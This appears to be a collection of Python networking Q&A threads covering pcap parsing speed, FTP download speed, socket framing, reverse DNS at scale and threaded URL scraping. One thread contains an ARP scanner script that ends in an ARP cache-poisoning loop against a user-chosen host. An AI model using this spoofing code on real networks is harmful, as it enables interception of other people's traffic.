I am comparing scapy and dpkt in terms of speed. I have a directory with pcap files which I parse and count the http requests in each file. Here's the scapy code :
import time
from scapy.all import *
def parse(f):
x = 0
pcap = rdpcap(f)
for p in pcap:
try:
if p.haslayer(TCP) and p.getlayer(TCP).dport == 80 and p.haslayer(Raw):
x = x + 1
except:
continue
print x
if __name__ == '__main__':\
path = '/home/pcaps'
start = time.time()
for file in os.listdir(path):
current = os.path.join(path, file)
print current
f = open(current)
parse(f)
f.close()
end = time.time()
print (end - start)
The script is really slow (it gets stuck after a few minutes) compared to the dpkt version :
import dpkt
import time
from os import walk
import os
import sys
def parse(f):
x = 0
try:
pcap = dpkt.pcap.Reader(f)
except:
print "Invalid Header"
return
for ts, buf in pcap:
try:
eth = dpkt.ethernet.Ethernet(buf)
except:
continue
if eth.type != 2048:
continue
try:
ip = eth.data
except:
continue
if ip.p == 6:
if type(eth.data) == dpkt.ip.IP:
tcp = ip.data
if tcp.dport == 80:
try:
http = dpkt.http.Request(tcp.data)
x = x+1
except:
continue
print x
if __name__ == '__main__':
path = '/home/pcaps'
start = time.time()
for file in os.listdir(path):
current = os.path.join(path, file)
print current
f = open(current)
parse(f)
f.close()
end = time.time()
print (end - start)
So it there something wrong with the way I am using scapy? Or is it just that scapy is slower than dpkt?
You inspired me to compare. 2 GB PCAP. Dumb test. Simply counting the number of packets.
I'd expect this to be in single digit minutes with C++ / libpcap just based on previous timings of similar sized files. But this is something new. I wanted to prototype first. My velocity is generally higher in Python.
For my application, streaming is the only option. I'll be reading several of these PCAPs simultaneously and doing computations based on their contents. Can't just hold in memory. So I'm only comparing streaming calls.
scapy 2.4.5:
from scapy.all import *
import datetime
i=0
print(datetime.datetime.now())
for packet in PcapReader("/my.pcap"):
i+=1
else:
print(i)
print(datetime.datetime.now())
dpkt 1.9.7.2:
import datetime
import dpkt
print(datetime.datetime.now())
with open(pcap_file, 'rb') as f:
pcap = dpkt.pcap.Reader(f)
i=0
for timestamp, buf in pcap:
i+=1
else:
print(i)
print(datetime.datetime.now())
Results:
Packet count is the same. So that's good. :-)
dkpt - Just under 10 minutes.
scapy - 35 minutes.
dkpt went first. So if disk cache were helping a package, it would be scapy. And I think it might be marginally. I did this previously with scapy only, and it was over 40 minutes.
In summary, thanks for your 5 year old question. It's still relevant today. I almost bailed on Python here because of the overly long read speeds from scapy. dkpt seems substantially more performant.
Side note, alternative packages:
https://pypi.org/project/python-libpcap/ I'm on python 3.10 and 0.4.0 seems broken for me, unfortunately.
https://pypi.org/project/libpcap/ I'd like to compare timings to this, but have found it much harder to get a minimal example going. Haven't spent much time though, to be fair.
Related
I want to know how many data has been downloaded in the last 1 second.
I don't have a code yet but I was wondering when I should start counting this 1 second and how to do it.
Should I start counting before retrbinary() or after? Or am I totally wrong?
First, there are ready-made implementations for transfer progress display, including the transfer speed.
For an example, the progressbar2 module. See Show FTP download progress in Python (ProgressBar).
The progressbar2 by default displays FileTransferSpeed widget, what is an average transfer speed since the download started.
Though note that speed displays usually do not show such speed. They display an average speed over last few seconds. That makes the value more informative. The progressbar2 has AdaptiveTransferSpeed widget for that. But it seems to be broken.
If you want to implement the calculation on your own, and are happy with the simple average transfer speed since the download started, it is easy:
from ftplib import FTP
import time
import sys
import datetime
ftp = FTP(host, user, passwd)
print("Downloading")
total_length = 0
start_time = datetime.datetime.now()
def write(data):
f.write(data)
global total_length
global start_time
total_length += sys.getsizeof(data)
elapsed = (datetime.datetime.now() - start_time)
speed = (total_length / elapsed.total_seconds())
print("\rElapsed: {0} Speed: {1:.2f} kB/s".format(str(elapsed), speed / 1024), end="")
f = open('file.dat', 'wb')
ftp.retrbinary("RETR /file.dat", write)
f.close()
print()
print("done")
It is a way more difficult to calculate the average speed in the last seconds. You have to remember the amount of data transferred at past moments. Stealing (and fixing) the code from AdaptiveTransferSpeed, you will get something like:
sample_times = []
sample_values = []
INTERVAL = datetime.timedelta(milliseconds=100)
last_update_time = None
samples=datetime.timedelta(seconds=2)
total_length = 0
def write(data):
f.write(data)
global total_length
total_length += sys.getsizeof(data)
elapsed = (datetime.datetime.now() - start_time)
if sample_times:
sample_time = sample_times[-1]
else:
sample_time = datetime.datetime.min
t = datetime.datetime.now()
if t - sample_time > INTERVAL:
# Add a sample but limit the size to `num_samples`
sample_times.append(t)
sample_values.append(total_length)
minimum_time = t - samples
minimum_value = sample_values[-1]
while (sample_times[2:] and
minimum_time > sample_times[1] and
minimum_value > sample_values[1]):
sample_times.pop(0)
sample_values.pop(0)
delta_time = sample_times[-1] - sample_times[0]
delta_value = sample_values[-1] - sample_values[0]
if delta_time:
speed = (delta_value / delta_time.total_seconds())
print("\rElapsed: {0} Speed: {1:.2f} kB/s".format(
str(elapsed), speed / 1024), end="")
ftp.retrbinary("RETR /medium.dat", write)
Client side:
def send_file_to_hashed(data, tcpsock):
time.sleep(1)
f = data
flag = 0
i=0
tcpsock.send(hashlib.sha256(f.read()).hexdigest())
f.seek(0)
time.sleep(1)
l = f.read(BUFFER_SIZE-64)
while True:
while (l):
tcpsock.send(hashlib.sha256(l).hexdigest() + l)
time.sleep(1)
hashok = tcpsock.recv(6)
if hashok == "HASHOK":
l = f.read(BUFFER_SIZE-64)
flag = 1
if hashok == "BROKEN":
flag = 0
if not l:
time.sleep(1)
tcpsock.send("DONE")
break
return (tcpsock,flag)
def upload(filename):
flag = 0
while(flag == 0):
with open(os.getcwd()+'\\data\\'+ filename +'.csv', 'rU') as UL:
tuplol = send_file_to_hashed(UL ,send_to_sock(filename +".csv",send_to("upload",TCP_IP,TCP_PORT)))
(sock,flagn) = tuplol
flag = flagn
time.sleep(2)
sock.close()
Server Side:
elif(message == "upload"):
message = rec_OK(self.sock)
fis = os.getcwd()+'/data/'+ time.strftime("%H:%M_%d_%m_%Y") + "_" + message
f = open(fis , 'w')
latest = open(os.getcwd()+'/data/' + message , 'w')
time.sleep(1)
filehash = rec_OK(self.sock)
print("filehash:" + filehash)
while True:
time.sleep(1)
rawdata = self.sock.recv(BUFFER_SIZE)
log.write("rawdata :" + rawdata + "\n")
data = rawdata[64:]
dhash = rawdata[:64]
log.write("chash: " + dhash + "\n")
log.write("shash: " + hashlib.sha256(data).hexdigest() + "\n")
if dhash == hashlib.sha256(data).hexdigest():
f.write(data)
latest.write(data)
self.sock.send("HASHOK")
log.write("HASHOK\n" )
print"HASHOK"
else:
self.sock.send("HASHNO")
print "HASHNO"
log.write("HASHNO\n")
if rawdata == "DONE":
f.close()
f = open(fis , 'r')
if (hashlib.sha256(f.read()).hexdigest() == filehash):
print "ULDONE"
log.write("ULDONE")
f.close()
latest.close()
break
else:
self.sock.send("BROKEN")
print hashlib.sha256(f.read()).hexdigest()
log.write("BROKEN")
print filehash
print "BROKEN UL"
f.close()
So the data upload is working fine in all tests that i ran from my computer, even worked fine while uploading data over my mobile connection and still sometimes people say it takes a long time and they kill it after a few minutes. the data is there on their computers but not on the server. I don't know what is happening please help!
First of all: this is unrelated to sha.
Streaming over the network is unpredictable. This line
rawdata = self.sock.recv(BUFFER_SIZE)
doesn't guarantee that you read BUFFER_SIZE bytes. You may have read only 1 byte in the worst case scenario. Therefore your server side is completely broken because of the assumption that rawdata contains whole message. It is even worse. If the client sends command and hash fast you may get e.g. rawdata == 'DONEa2daf78c44(...) which is a mixed output.
The "hanging" part just follows from that. Trace your code and see what happens when the server receives partial/broken messages ( I already did that in my imagination :P ).
Streaming over the network is almost never as easy as calling sock.send on one side and sock.recv on the other side. You need some buffering/framing protocol. For example you can implement this simple protocol: always interpret first two bytes as the size of incoming message, like this:
client (pseudocode)
# convert len of msg into two-byte array
# I am assuming the max size of msg is 65536
buf = bytearray([len(msg) & 255, len(msg) >> 8])
sock.sendall(buf)
sock.sendall(msg)
server (pseudocode)
size = to_int(sock.recv(1))
size += to_int(sock.recv(1)) << 8
# You need two calls to recv since recv(2) can return 1 byte.
# (well, you can try recv(2) with `if` here to avoid additional
# syscall, not sure if worth it)
buffer = bytearray()
while size > 0:
tmp = sock.recv(size)
buffer += tmp
size -= len(tmp)
Now you have properly read data in buffer variable which you can work with.
WARNING: the pseudocode for the server is simplified. For example you need to check for empty recv() result everywhere (including where size is calculated). This is the case when the client disconnects.
So unfortunately there's a lot of work in front of you. You have to rewrite whole sending and receving code.
I'm trying to build a arp scanner script with Scapy. Everytime I perform a scan, I don't get the expected result. I get only two responses: one from the gateway and another one from my host machine (I'm performing the scan from a virtual machine Kali). Sometimes, I only get one more response, that's all. But, when I'm doing a ARP discovery with another tool (like Nmap), I get all expected responses (from eight machines). What's wrong in my code guys ? Can you help me ? :-(.
from scapy.all import *
import sys
from datetime import datetime
def Out():
print "\nBye!"
sys.exit(1)
try:
os.system('clear')
interface = raw_input("Enter interface : ")
ips = raw_input("Enter network address : ")
collection = []
print "Scanning..."
start_time = datetime.now()
conf.verb = 0
ans, unans = srp(Ether(dst="FF:FF:FF:FF:FF")/ARP(pdst=ips),iface=interface,timeout=2,inter=0.5) #Arp scanner starts here
n=0
for snd,rcv in ans:
result = rcv.sprintf(r"%Ether.src% : %ARP.psrc%")
collection.append(result) #append to collection
print n, "-", collection[n]
n=n+1
stop_time = datetime.now()
print "\nScan done in ", stop_time - start_time, " seconds."
if n > 0:
target=raw_input("\nPlease enter host to arp poison : ")
gw_addr=raw_input("Enter the gateway address : ")
print "\nArp poison on host", target, "starting...\nHit Ctrl + C to Stop.\n"
p=ARP(pdst=target,psrc=gw_addr) #arp poison attack starts here
send(p,inter=RandNum(10,40),loop=1)
else:
Out()
except KeyboardInterrupt:
Out()
try to make the tool work infinitely and use that code to re-print the results
import sys
print"\rthe result",
sys.stdout.flush()
I think that first result gave you the only this moment traffics and the Infinit loop will monitor all the result.
I hope you find it out ;)
I am planning to run Reverse DNS on 47 Million ips. Here is my code
with open(file,'r') as f:
with open ('./ip_ptr_new.txt','a') as w:
for l in f:
la = l.rstrip('\n')
ip,countdomain = la.split('|')
ips.append(ip)
try:
ais = socket.gethostbyaddr(ip)
print ("%s|%s|%s" % (ip,ais[0],countdomain), file = w)
except:
print ("%s|%s|%s" % (ip,"None",countdomain), file = w)
Currently it is very slow. Does anybody have any suggestions for speed it up?
Try using a multiprocessing module. I have timed the performance for about 8000 ips and I got this:
#dns.py
real 0m2.864s
user 0m0.788s
sys 0m1.216s
#slowdns.py
real 0m17.841s
user 0m0.712s
sys 0m0.772s
# dns.py
from multiprocessing import Pool
import socket
def dns_lookup(ip):
ip, countdomain = ip
try:
ais = socket.gethostbyaddr(ip)
print ("%s|%s|%s" % (ip,ais[0],countdomain))
except:
print ("%s|%s|%s" % (ip,"None",countdomain))
if __name__ == '__main__':
filename = "input.txt"
ips = []
with open(filename,'r') as f:
with open ('./ip_ptr_new.txt','a') as w:
for l in f:
la = l.rstrip('\n')
ip,countdomain = la.split('|')
ips.append((ip, countdomain))
p = Pool(5)
p.map(dns_lookup, ips)
#slowdns.py
import socket
from multiprocessing import Pool
filename = "input.txt"
if __name__ == '__main__':
ips = []
with open(filename,'r') as f:
with open ('./ip_ptr_new.txt','a') as w:
for l in f:
la = l.rstrip('\n')
ip,countdomain = la.split('|')
ips.append(ip)
try:
ais = socket.gethostbyaddr(ip)
print ("%s|%s|%s" % (ip,ais[0],countdomain), file = w)
except:
print ("%s|%s|%s" % (ip,"None",countdomain), file = w)
One solution here is to use the nslookup shell commande with the option timeout. Possibly the host command...
An example not perfect but useful!
def sh_dns(ip,dns):
a=subprocess.Popen(['timeout','0.2','nslookup','-norec',ip,dns],stdout=subprocess.PIPE)
sortie=a.stdout.read()
tab=str(sortie).split('=')
if(len(tab)>1):
return tab[len(tab)-1].strip(' \\n\'')
else:
return ""
We recently had to deal with this problem also.
Running on multiple processes didn't provide a good enough solution.
It could take several days to process few millions of IPs from a strong AWS machine.
What worked well is using Amazon EMR, it took around half an hour on 10 machines cluster.
You cannot scale too much with one machine (and usually one network interface) as it's a network intensive task. Using Map Reduce with multiple machines certainly did the work.
I need to extract all the urls from an ip list,
i wrote this python script, but i have issue extracting the same ip multiple times (more threads are created with the same ip).
Could anyone Improve on my solution using multithreading ?
Sorry for my english
Thanks all
import urllib2, os, re, sys, os, time, httplib, thread, argparse, random
try:
ListaIP = open(sys.argv[1], "r").readlines()
except(IOError):
print "Error: Check your IP list path\n"
sys.exit(1)
def getIP():
if len(ListaIP) != 0:
value = random.sample(ListaIP, 1)
ListaIP.remove(value[0])
return value
else:
print "\nListaIPs sa terminat\n"
sys.exit(1)
def extractURL(ip):
print ip + '\n'
page = urllib2.urlopen('http://sameip.org/ip/' + ip)
html = page.read()
links = re.findall(r'href=[\'"]?([^\'" >]+)', html)
outfile = open('2.log', 'a')
outfile.write("\n".join(links))
outfile.close()
def start():
while True:
if len(ListaIP) != 0:
test = getIP()
IP = ''.join(test).replace('\n', '')
extractURL(IP)
else:
break
for x in range(0, 10):
thread.start_new_thread( start, () )
while 1:
pass
use a threading.Lock. The lock should be global, and create at the beginning when you create the IP list.
lock.acquire at the start of getIP()
and release it before you leave the method.
What you are seeing is, thread 1 executes value=random.sample, and then thread 2 also executes value=random.sample before thread 1 gets to the remove. So the item is still in the list at the time thread 2 gets there.
Therefore both threads have a chance of getting the same IP.